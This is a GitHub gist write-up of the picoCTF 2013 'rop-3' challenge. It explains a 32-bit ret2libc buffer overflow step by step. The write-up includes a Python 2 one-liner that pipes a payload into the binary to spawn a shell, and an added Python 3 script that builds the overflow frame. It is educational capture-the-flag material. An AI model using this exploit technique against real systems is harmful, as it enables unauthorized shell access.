@spnow
Forked from plvhx/README.md
Created December 22, 2016 12:48
picoCTF 2013 rop-3 re-writeup

Very trivial, though. :v

(1) the junk needed to reach the saved return address is 0x80 + 12 = 140 bytes (a 0x80-byte buffer plus the locals/saved registers between it and the return address)
(2) find the address of libc's system() in gdb
(3) find the address of libc's exit() in gdb (this becomes the address system() returns to, so the process exits cleanly instead of crashing)
(4) find a '/bin/sh' string inside libc in gdb (find &system,+9999999,"/bin/sh") and note its address
(5) pwned!

Caveat: the libc addresses found this way are only reusable in the payload when they are stable between the gdb session and the real run, i.e. with ASLR off (or after obtaining a libc leak); they also change with the libc version.

The binary reports NX as disabled, but that is not what makes this work: ret2libc only executes code that is already mapped (system() in libc), so it works regardless of whether the stack is executable, and it is the standard choice precisely when NX *is* enabled and shellcode on the stack cannot run. Do a standard 'ret2libc' attack against this contrived binary. Payload construction (32-bit little-endian, cdecl: return address, then the address system() returns to, then its first argument):

["\x41"*(0x80 + 12)] + [address of system] + [address of exit] + [address of the '/bin/sh' string in libc] = pwned!

Note the last element is the address of the string, not the string itself; system() takes a char* and the copy inside libc is already NUL-terminated.

(python -c 'import sys,struct;sys.stdout.write("\x41"*(0x80 + 12) + struct.pack("<I", 0x40067170) + struct.pack("<I", 0x4005cfc0) + struct.pack("<I", 0x40186be3))'; cat -) | ./rop3-7f3312fe43c46d26

The trailing `cat -` keeps stdin open after the payload so the spawned shell can read commands. The one-liner is Python 2: in Python 3, `sys.stdout.write` on a str would UTF-8-encode the address bytes above 0x7f (0xc0, 0xe3) into two bytes each and corrupt the frame; use `sys.stdout.buffer.write` with bytes instead. The three addresses are specific to the libc and load address of the author's environment.
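As an added example (not the gist's own code), the same ret2libc frame built in Python 3, with the '/bin/sh' lookup of step (4) reproduced offline against a constructed stand-in for libc memory. The libc blob, its base address `FAKE_LIBC_BASE` and the string offset are constructed for illustration and are not the real rop3 binary's values; the `system`/`exit` addresses in the usage block are the ones from the writeup.

```python
#!/usr/bin/env python3
"""Added example: 32-bit ret2libc frame builder for the layout in the writeup.
Not the gist's original code. FAKE_LIBC / FAKE_LIBC_BASE are constructed
stand-ins for libc memory so the '/bin/sh' search runs offline."""
import struct
import sys

# Constructed stand-in for a region of libc memory, the region gdb's
# `find &system,+N,"/bin/sh"` would scan. Real libc is much larger.
FAKE_LIBC_BASE = 0x40000000                                   # assumed load address
FAKE_LIBC = b"\x90" * 0x1000 + b"/bin/sh\x00" + b"\x90" * 0x100

# Distance from the start of the overflowed buffer to the saved return
# address, per the writeup: 0x80-byte buffer + 12 bytes of locals/saved regs.
OFFSET = 0x80 + 12


def find_string(mem: bytes, base: int, needle: bytes = b"/bin/sh\x00") -> int:
    """Return the absolute address of `needle` inside `mem`, which is
    assumed to be mapped at `base`. The NUL is included in the needle so
    the match is a complete C string, which system() requires."""
    off = mem.find(needle)
    if off < 0:
        raise ValueError("needle not found in memory image")
    return base + off


def build_ret2libc(offset: int, system: int, ret_after: int, binsh: int) -> bytes:
    """Classic 32-bit cdecl ret2libc frame:
        [padding][system][ret_after][binsh]
    - system    overwrites the saved EIP, so `ret` jumps into system()
    - ret_after is where system() returns to (exit, for a clean shutdown)
    - binsh     is system()'s first argument: a pointer to "/bin/sh" in libc
    """
    for v in (system, ret_after, binsh):
        if not 0 <= v <= 0xFFFFFFFF:
            raise ValueError(f"{v:#x} is not a 32-bit address")
    return b"\x41" * offset + struct.pack("<III", system, ret_after, binsh)


def parse_frame(payload: bytes, offset: int) -> tuple:
    """Decode a built payload back into (system, ret_after, binsh) so the
    layout can be checked before sending it to the target."""
    if len(payload) < offset + 12:
        raise ValueError("payload too short for a ret2libc frame")
    return struct.unpack("<III", payload[offset:offset + 12])


if __name__ == "__main__":
    # system/exit addresses from the writeup (only valid for that libc with
    # ASLR off); the '/bin/sh' address comes from the constructed blob here.
    binsh = find_string(FAKE_LIBC, FAKE_LIBC_BASE)
    payload = build_ret2libc(OFFSET, 0x40067170, 0x4005cfc0, binsh)
    # Write raw bytes, not str: str would UTF-8-encode bytes above 0x7f.
    sys.stdout.buffer.write(payload)
```

Usage mirrors the one-liner: `(python3 build.py; cat -) | ./rop3-7f3312fe43c46d26`, after replacing the constructed '/bin/sh' lookup with the address gdb reports for the real libc. `parse_frame` is there to confirm the three words land at `OFFSET` before spending a run on the target.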